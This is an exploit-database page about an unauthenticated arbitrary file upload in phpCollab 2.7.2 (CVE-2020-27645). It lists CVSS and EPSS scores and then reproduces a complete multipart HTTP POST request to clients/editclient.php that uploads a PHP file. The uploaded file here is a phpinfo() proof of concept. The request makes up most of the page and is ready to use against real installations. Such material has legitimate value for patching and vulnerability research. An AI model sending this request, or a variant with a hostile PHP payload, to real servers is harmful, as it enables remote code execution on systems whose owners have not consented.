Advertisement






phpCollab 2.7.2 - Arbitrary File Upload

CVE Category Price Severity
CVE-2020-27645 CWE-434 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-04-28
CPE
cpe:cpe:/a:phpcollab:phpcollab:2.7.2
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020040175

Below is a copy:

phpCollab 2.7.2 - Arbitrary File Upload
#/
#*  phpCollab 2.7.2 - Arbitrary File Upload
#* Author  : Trung Le
#* Tutorial Video : https://www.youtube.com/watch?v=zHuJkoQe4Tc
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#* Blog: baomatcoban.info
#/
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
Request:
----------
POST /phpcol/clients/editclient.php?action=add& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------42876024093685464851592998730
Content-Length: 1280
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/phpcol/clients/editclient.php?&
Upgrade-Insecure-Requests: 1

-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000000
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="owner"

1
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="name"

Process 2.7
-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="address"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="phone"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="url"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="email"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="comments"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="hourly_rate"


-----------------------------42876024093685464851592998730
Content-Disposition: form-data; name="upload"; filename="index.php"
Content-Type: application/octet-stream

<?php

phpinfo();

-----------------------------42876024093685464851592998730--

----------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum